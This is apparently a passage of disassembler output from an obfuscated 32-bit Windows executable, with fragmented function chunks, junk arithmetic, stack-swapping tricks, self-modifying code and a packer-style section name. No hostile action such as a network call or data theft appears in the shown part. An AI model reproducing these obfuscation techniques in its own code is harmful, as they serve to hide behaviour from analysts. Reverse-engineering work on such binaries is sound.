; END OF FUNCTION CHUNK FOR sub_440493
; =============== S U B R O U T I N E =======================================
sub_452AAF proc near ; DATA XREF: sub_43AB62:loc_43E93Ao
; FUNCTION CHUNK AT 0044348E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F74E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452137 SIZE 00000020 BYTES
push 43FE6304h
pop eax
xor eax, 5A15CC3h
sub eax, 5430CDB7h
and eax, 0AC5336BAh
jmp loc_44348E
sub_452AAF endp
; ---------------------------------------------------------------------------
jno loc_44D9C3
jmp sub_43E55D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C8F3
loc_452AD7: ; CODE XREF: ut7h7i2x:00444A98j
; sub_44C8F3+14j
jz loc_43EE8A
jmp loc_43BE33
; END OF FUNCTION CHUNK FOR sub_44C8F3
; =============== S U B R O U T I N E =======================================
sub_452AE2 proc near ; DATA XREF: sub_444A08:loc_445EA8o
; FUNCTION CHUNK AT 00443FDC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00449DE3 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004512C2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045642B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045877F SIZE 00000005 BYTES
inc dword ptr [ebp-28h]
mov eax, [ebp-28h]
mov byte ptr [eax], 0
inc dword ptr [ebp-24h]
jmp loc_4512C2
sub_452AE2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_452AF3: ; CODE XREF: sub_449E96-7D78j
call sub_44A5AB
loc_452AF8: ; CODE XREF: sub_44305D:loc_444F2Dj
jmp sub_44A833
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456F1D
loc_452AFD: ; CODE XREF: sub_456F1D-B35Aj
adc edx, 0CEFFED9Ch
loc_452B03: ; CODE XREF: sub_456F1D:loc_443F55j
push eax
call sub_4586A8
loc_452B09: ; CODE XREF: sub_448321+8682j
jmp loc_44F3D9
; END OF FUNCTION CHUNK FOR sub_456F1D
; ---------------------------------------------------------------------------
loc_452B0E: ; CODE XREF: ut7h7i2x:0044A15Fj
jb loc_4491D9
; =============== S U B R O U T I N E =======================================
sub_452B14 proc near ; CODE XREF: sub_43CE34+FA8Ep
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439772 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043A3EE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043BB5B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043C28B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E896 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043ED88 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0043FA64 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043FF04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440EC8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442379 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442AF7 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004437EA SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00445359 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004485DE SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00448CC4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00448EDC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004493D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ACBE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BFF5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045050D SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00450949 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00450F91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455213 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004566DB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456F12 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004570F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045831A SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00459CE1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045A3E9 SIZE 00000010 BYTES
xchg eax, [esp+0]
pop eax
push 26C6E90Ah
pop esi
and esi, 8B3681E1h
jmp loc_43FA64
sub_452B14 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_452B29: ; CODE XREF: sub_454B2B-1AF7j
add esi, eax
loc_452B2B: ; CODE XREF: ut7h7i2x:loc_4572EFj
mov [ebp+0], esi
pop esi
pop ebp
pushf
jmp loc_44E213
; END OF FUNCTION CHUNK FOR sub_454B2B
; ---------------------------------------------------------------------------
sbb esi, 91AF46B5h
sbb eax, edx
jmp sub_4393B6
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443FC3
loc_452B44: ; CODE XREF: ut7h7i2x:loc_443A71j
; sub_443FC3+Aj
jmp loc_44B31C
; END OF FUNCTION CHUNK FOR sub_443FC3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_135. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A83C
loc_452B4A: ; CODE XREF: sub_45A83C-2EE1j
jmp loc_441C33
; END OF FUNCTION CHUNK FOR sub_45A83C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_452B4F proc near ; CODE XREF: sub_4471CA+A88Bj
; sub_457A0Dp
; FUNCTION CHUNK AT 004464D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EF5F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044F2BF SIZE 00000005 BYTES
push ebp
mov ebp, esp
jmp loc_44F2BF
sub_452B4F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_452B57: ; CODE XREF: sub_44865D-1508j
jz loc_43BFA3
push ebp
loc_452B5E: ; CODE XREF: sub_447132+12j
; ut7h7i2x:loc_44795Fj
rol edi, 3
add edi, 2A48590Fh
xchg edi, [esp+0]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
jo loc_4469E6
jmp sub_44F10F
; ---------------------------------------------------------------------------
call nullsub_21
jmp ds:dword_41D18C
; ---------------------------------------------------------------------------
loc_452B85: ; CODE XREF: ut7h7i2x:00456455j
jmp loc_43F258
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B87B
loc_452B8A: ; CODE XREF: sub_44B87B+3DC1j
jmp nullsub_422
; END OF FUNCTION CHUNK FOR sub_44B87B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_21. PRESS KEYPAD "+" TO EXPAND]
dd 0FFBF6784h, 0DD7768FFh, 0C5E90043h
db 2Eh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A79F
loc_452B9F: ; CODE XREF: sub_45A79F:loc_458510j
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_448B14
jmp loc_45ACBF
; END OF FUNCTION CHUNK FOR sub_45A79F
; ---------------------------------------------------------------------------
loc_452BB1: ; CODE XREF: ut7h7i2x:loc_45A105j
sub edx, 2217719Bh
jnz loc_45325E
jbe loc_4455EB
ror eax, 18h
jnb loc_456146
jmp loc_43BA15
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444AA3
loc_452BD1: ; CODE XREF: sub_444AA3+E6B6j
not eax
jnz sub_454047
push 20EC4736h
adc ebp, 7035DA3Fh
jmp loc_453B10
; END OF FUNCTION CHUNK FOR sub_444AA3
; =============== S U B R O U T I N E =======================================
sub_452BE9 proc near ; CODE XREF: sub_453D8B:loc_43B08Ep
; sub_4497C1+6BC0j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043EF5D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440AAA SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004410F9 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044CE7B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456A85 SIZE 00000017 BYTES
xchg edx, [esp+0]
pop edx
xor eax, 0CBC72DF3h
rol eax, 3
mov ds:dword_446810, eax
loc_452BFC: ; CODE XREF: sub_45633E-11D7Aj
; sub_45633E+Ej
ror eax, 3
jmp loc_440AAA
sub_452BE9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg esi, [ecx]
jmp loc_44272F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_452C0B: ; CODE XREF: sub_44DB48-195Aj
jz loc_45AB72
jmp loc_45AB25
; END OF FUNCTION CHUNK FOR sub_44DB48
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_161. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ADDB
loc_452C17: ; CODE XREF: sub_43ADDB+134B1j
jmp loc_448BD3
; END OF FUNCTION CHUNK FOR sub_43ADDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F058
loc_452C1C: ; CODE XREF: sub_43F058+9j
jmp sub_442C22
; END OF FUNCTION CHUNK FOR sub_43F058
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B83C
loc_452C21: ; CODE XREF: sub_43B83C+6j
jmp loc_457BE0
; END OF FUNCTION CHUNK FOR sub_43B83C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CEB
loc_452C26: ; CODE XREF: sub_447CEB-CC22j
jmp nullsub_197
; END OF FUNCTION CHUNK FOR sub_447CEB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_452C2B: ; CODE XREF: sub_43EF73+181B4j
mov eax, [eax]
test eax, 1
jz loc_458413
jmp loc_44E586
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_452C3D: ; CODE XREF: sub_43F7A5+94AAj
call sub_43AA94
push edx
push 0D788B884h
pop edx
jmp loc_44B9ED
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_452C4E: ; CODE XREF: sub_439AE7+16980j
adc ecx, eax
push 8395C25Eh
jmp loc_457BAE
; END OF FUNCTION CHUNK FOR sub_439AE7
; =============== S U B R O U T I N E =======================================
sub_452C5A proc near ; CODE XREF: sub_43AA94+10B81p
; ut7h7i2x:00456D43j
; FUNCTION CHUNK AT 00445C0D SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
mov byte ptr [eax], 0C3h
jmp loc_445C0D
sub_452C5A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_452C66 proc near ; CODE XREF: sub_417722+39p
; ut7h7i2x:00442B21j
; DATA XREF: ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043F60C SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00441F2E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442B2C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044BA5F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BAA9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044C536 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044D6DE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E4F9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00451BD8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457770 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00458EA4 SIZE 0000000E BYTES
push ebx
push 0B9374D6Bh
jmp loc_44C536
sub_452C66 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_452C71 proc near ; DATA XREF: sub_439BD1+203D4o
var_4 = dword ptr -4
push esi
mov esi, ecx
xchg esi, [esp+4+var_4]
mov ecx, eax
xchg ecx, [esp+4+var_4]
retn
sub_452C71 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_452C7D: ; CODE XREF: sub_44917B-629Aj
jmp loc_43E961
; END OF FUNCTION CHUNK FOR sub_44917B
; =============== S U B R O U T I N E =======================================
sub_452C82 proc near ; CODE XREF: sub_4459EE+10F18p
; FUNCTION CHUNK AT 0044CD7A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045507D SIZE 0000000B BYTES
push ebp
jmp loc_45507D
sub_452C82 endp
; =============== S U B R O U T I N E =======================================
sub_452C88 proc near ; DATA XREF: sub_44FA51-F24Do
arg_C = dword ptr 10h
mov ecx, [esp+arg_C]
push offset loc_4477D8
loc_452C91: ; CODE XREF: ut7h7i2x:0045A80Ej
jmp nullsub_494
sub_452C88 endp
; ---------------------------------------------------------------------------
loc_452C96: ; CODE XREF: ut7h7i2x:loc_44C12Aj
call sub_451980
loc_452C9B: ; CODE XREF: ut7h7i2x:0044A8FAj
jmp loc_442386
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450231
loc_452CA0: ; CODE XREF: sub_450231-906Cj
jmp loc_44A30A
; END OF FUNCTION CHUNK FOR sub_450231
; ---------------------------------------------------------------------------
loc_452CA5: ; CODE XREF: ut7h7i2x:0043EF28j
jmp loc_44EC34
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_452CAA: ; CODE XREF: sub_446CA0:loc_4427D9j
jnz loc_44EEDC
jmp loc_45369B
; END OF FUNCTION CHUNK FOR sub_446CA0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_542. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_452CB6: ; CODE XREF: ut7h7i2x:00447074j
jmp loc_43924D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_452CBB proc near ; CODE XREF: sub_4554BDj
; FUNCTION CHUNK AT 0043C034 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043DE09 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004426C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044274B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00443A8D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449EF3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BC32 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CE1B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00450D51 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045825F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00458F5A SIZE 00000012 BYTES
push ebp
mov ebp, esp
push ecx
jmp loc_43DE09
sub_452CBB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_452CC4: ; CODE XREF: ut7h7i2x:00448B7Fj
jbe loc_4489C6
and esi, ebp
loc_452CCC: ; CODE XREF: ut7h7i2x:loc_43A2A6j
mov eax, [esp]
push eax
jmp loc_4491E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C99C
loc_452CD5: ; CODE XREF: sub_44C99C:loc_439298j
jnz loc_451ADE
jmp loc_44C621
; END OF FUNCTION CHUNK FOR sub_44C99C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44937E
loc_452CE0: ; CODE XREF: sub_44937E+6844j
push edx
pop ecx
call sub_445D25
; END OF FUNCTION CHUNK FOR sub_44937E
; =============== S U B R O U T I N E =======================================
sub_452CE7 proc near ; CODE XREF: ut7h7i2x:loc_446489p
; ut7h7i2x:00453BEAj
xchg ebx, [esp+0]
pop ebx
call sub_44C068
mov edx, 3BD2EC5Ch
jmp loc_442BEF
sub_452CE7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test al, al
jz loc_44F6E8
jmp loc_454803
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AE1A
loc_452D07: ; CODE XREF: sub_43AE1A:loc_43BFB3j
ror eax, 11h
push edx
push 7141D404h
pop edx
loc_452D11: ; CODE XREF: sub_43FF65:loc_44C50Dj
rol edx, 3
sub edx, 0BA90B2E1h
jmp loc_450C1D
; END OF FUNCTION CHUNK FOR sub_43AE1A
; =============== S U B R O U T I N E =======================================
sub_452D1F proc near ; CODE XREF: ut7h7i2x:00451107j
; sub_459584p
xchg ebx, [esp+0]
pop ebx
call sub_452D3D
jmp ds:off_41D198
sub_452D1F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_452D2E: ; CODE XREF: ut7h7i2x:00455D3Aj
jmp loc_44D527
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442836
loc_452D33: ; CODE XREF: sub_442836+16j
jmp loc_443EFA
; END OF FUNCTION CHUNK FOR sub_442836
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1E5
loc_452D38: ; CODE XREF: sub_43C1E5+18j
jmp loc_440E9C
; END OF FUNCTION CHUNK FOR sub_43C1E5
; =============== S U B R O U T I N E =======================================
sub_452D3D proc near ; CODE XREF: sub_442B3B:loc_440F13j
; ut7h7i2x:0044E45Bj ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043AC53 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043D73A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043D782 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E8BF SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043EFE1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043FCD3 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00440D06 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004419E6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442E11 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443E3F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445720 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445E51 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004480F7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044ACA9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B327 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044D88F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044E460 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045073C SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0045251F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045621D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00456912 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456DF2 SIZE 00000014 BYTES
jo loc_44E460
xchg ecx, [esp-4+arg_0]
mov edx, ecx
pop ecx
jmp loc_443E3F
sub_452D3D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DD39
loc_452D4E: ; CODE XREF: sub_44DD39-E155j
mov [ebp-0Ch], eax
jmp loc_439E37
; END OF FUNCTION CHUNK FOR sub_44DD39
; =============== S U B R O U T I N E =======================================
sub_452D56 proc near ; CODE XREF: sub_458345-AFB7j
; ut7h7i2x:loc_44F6E8p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00446D12 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045994C SIZE 00000001 BYTES
; FUNCTION CHUNK AT 0045A4BB SIZE 0000000E BYTES
jb sub_4455F4
push edi
mov edi, ebp
xchg edi, [esp+4+var_4]
mov ebp, esp
call sub_455DCD
loc_452D69: ; CODE XREF: sub_44AC75+13j
jmp loc_45A4BB
sub_452D56 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test al, al
jz loc_451FE4
jmp loc_43ADFE
; ---------------------------------------------------------------------------
mov ebx, [edi]
jmp sub_4456B6
; ---------------------------------------------------------------------------
xor ecx, 890A559Eh
jmp sub_450606
; ---------------------------------------------------------------------------
loc_452D8D: ; DATA XREF: sub_459111-B6o
lea eax, loc_455640
mov byte ptr [eax], 0C3h
jmp loc_4567B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449957
loc_452D9B: ; CODE XREF: sub_449957:loc_455640j
pop edx
mov eax, [esp+0]
jmp loc_4394BC
; END OF FUNCTION CHUNK FOR sub_449957
; ---------------------------------------------------------------------------
loc_452DA4: ; CODE XREF: ut7h7i2x:loc_442831j
sub edi, 536FB4DDh
and edi, 0E0EFC9F4h
or edi, 0DB99F559h
jnz loc_44135E
jnb loc_456A33
jmp loc_449A8E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_452DC7: ; CODE XREF: sub_43FCEE+BC39j
jnz loc_44597B
jmp loc_43DDFE
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F943
loc_452DD2: ; CODE XREF: sub_44F943:loc_45A29Bj
jge loc_4451C5
loc_452DD8: ; CODE XREF: ut7h7i2x:0044BF25j
jmp loc_4450C6
; END OF FUNCTION CHUNK FOR sub_44F943
; ---------------------------------------------------------------------------
xchg edx, ebx
jmp loc_4451B9
; =============== S U B R O U T I N E =======================================
sub_452DE4 proc near ; CODE XREF: ut7h7i2x:00442D7Ep
; ut7h7i2x:0044D3DCj
xchg ecx, [esp+0]
pop ecx
sbb eax, eax
neg eax
push edx
push 0F72E6A84h
pop edx
and edx, 0C805A415h
jmp loc_442EEB
sub_452DE4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_452DFE: ; CODE XREF: sub_439BD1:loc_44B01Aj
cmp eax, 97CA04CDh
jmp loc_448BB3
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_452E09: ; CODE XREF: sub_44DF79-714Ej
cmp edx, ecx
jmp loc_443D77
; END OF FUNCTION CHUNK FOR sub_44DF79
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447167
loc_452E10: ; CODE XREF: sub_447167:loc_4448F9j
push offset sub_4596FF
jmp nullsub_317
; END OF FUNCTION CHUNK FOR sub_447167
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450E41
loc_452E1A: ; CODE XREF: sub_450E41-12147j
jb loc_440FB3
test ebx, edi
jmp loc_44EB63
; END OF FUNCTION CHUNK FOR sub_450E41
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_33. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_452E28: ; CODE XREF: sub_446F9A+12DFEj
jmp loc_457B5E
; END OF FUNCTION CHUNK FOR sub_446F9A
; ---------------------------------------------------------------------------
loc_452E2D: ; CODE XREF: ut7h7i2x:00439EB7j
jmp loc_447B3C
; ---------------------------------------------------------------------------
loc_452E32: ; CODE XREF: ut7h7i2x:0043D63Ej
cdq
; START OF FUNCTION CHUNK FOR sub_43BA9E
loc_452E33: ; CODE XREF: sub_43BA9E+1B83j
rol eax, 9
xor eax, 0FD915B24h
add eax, ebp
add eax, 0EC915A24h
jmp loc_44C6AA
; END OF FUNCTION CHUNK FOR sub_43BA9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_452E49: ; CODE XREF: sub_43F1B2:loc_446399j
add ecx, edx
mov edi, 1AD6497Bh
jmp loc_439F92
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
shl ebx, 10h
jmp loc_457CB7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A79F
loc_452E5D: ; CODE XREF: sub_45A79F-10D16j
cdq
jle loc_443058
sbb esi, 0F6D46E40h
jmp loc_448B14
; ---------------------------------------------------------------------------
loc_452E6F: ; CODE XREF: ut7h7i2x:loc_445011j
; sub_45A79F+Cj
call sub_449FFC
; END OF FUNCTION CHUNK FOR sub_45A79F
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_452E74: ; CODE XREF: sub_4529E0:loc_442EB8j
jz loc_45AD5D
jmp loc_43E680
; END OF FUNCTION CHUNK FOR sub_4529E0
; =============== S U B R O U T I N E =======================================
sub_452E7F proc near ; CODE XREF: sub_446F56:loc_446314j
; sub_43FA50+732Fp ...
push esi
mov esi, ebp
push offset aZ4LQshooiS_d ; "‡4$‹ìQShoOi+é.¤"
jmp nullsub_154
sub_452E7F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450472
loc_452E8C: ; CODE XREF: sub_450472-4A3Cj
push 2976E5D7h
loc_452E91: ; CODE XREF: sub_450472:loc_4576E1j
mov eax, [ebp-4]
jmp loc_43CD24
; END OF FUNCTION CHUNK FOR sub_450472
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_452E99: ; CODE XREF: sub_444EAA:loc_44A30Aj
cmp byte ptr [ebp-5], 0
jnz loc_44B4CE
jmp loc_457F42
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_452EA8: ; CODE XREF: sub_4524FE-1373j
jg loc_43DE51
loc_452EAE: ; CODE XREF: sub_4524FE:loc_439B81j
push edx
push 0C39FD03Eh
pop edx
or edx, 0DF5D6442h
and edx, 0DF5BA32Ch
or edx, 0A581122Dh
and edx, 3AFA35A9h
jmp loc_4571E9
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455145
loc_452ED2: ; CODE XREF: sub_455145:loc_44478Cj
jnz loc_454070
jmp loc_44E0CB
; END OF FUNCTION CHUNK FOR sub_455145
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45292B
loc_452EDD: ; CODE XREF: sub_45292B-158C8j
; ut7h7i2x:004553A5j
add ecx, 9C572C60h
push offset sub_447E36
jmp nullsub_328
; END OF FUNCTION CHUNK FOR sub_45292B
; =============== S U B R O U T I N E =======================================
sub_452EED proc near ; CODE XREF: ut7h7i2x:0043A8A3j
; sub_449DC4:loc_43EBFEp
; FUNCTION CHUNK AT 0043D52F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F4BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044269C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447758 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044E76A SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00456671 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045958E SIZE 00000014 BYTES
xchg edx, [esp+0]
pop edx
jmp loc_43D52F
sub_452EED endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_452EF6: ; CODE XREF: sub_450231:loc_451CACj
; sub_44602A+118CDj ...
xchg ebx, [esp+0]
mov ecx, ebx
xchg ecx, [esp+0]
jmp loc_44F058
; END OF FUNCTION CHUNK FOR sub_44602A
; =============== S U B R O U T I N E =======================================
sub_452F03 proc near ; DATA XREF: sub_446F56:loc_454636o
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004407A6 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045595C SIZE 00000005 BYTES
push ebx
push 3FF6FF78h
xchg esi, [esp+8+var_8]
mov ebx, esi
jmp loc_4407A6
sub_452F03 endp
; ---------------------------------------------------------------------------
loc_452F13: ; CODE XREF: ut7h7i2x:00451579j
mov ebp, esp
push ebx
push esi
mov esi, ecx
call sub_458C95
loc_452F1E: ; CODE XREF: ut7h7i2x:00457DABj
jmp loc_449C4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_452F23: ; CODE XREF: sub_457A66-9FE9j
jmp loc_44B8CC
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_452F28: ; CODE XREF: sub_448321:loc_43B47Ej
pop edx
mov eax, [esp-4+arg_0]
push ebx
not ebx
loc_452F2F: ; CODE XREF: ut7h7i2x:loc_458834j
jmp loc_43C863
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E592
loc_452F34: ; CODE XREF: sub_43E592+16DECj
pop eax
add eax, ds:4000F8h
xor eax, 4981BE3h
add eax, 9C0108E9h
test eax, 20000000h
jmp loc_43AFCC
; END OF FUNCTION CHUNK FOR sub_43E592
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_521. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_452F53: ; CODE XREF: ut7h7i2x:004510FBj
jmp locret_451E2F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CAB9
loc_452F58: ; CODE XREF: sub_44CAB9+D626j
xchg ebx, [esp-4+arg_0]
jmp loc_452919
; END OF FUNCTION CHUNK FOR sub_44CAB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450231
loc_452F60: ; CODE XREF: sub_450231-B6C8j
jnz loc_44F0F5
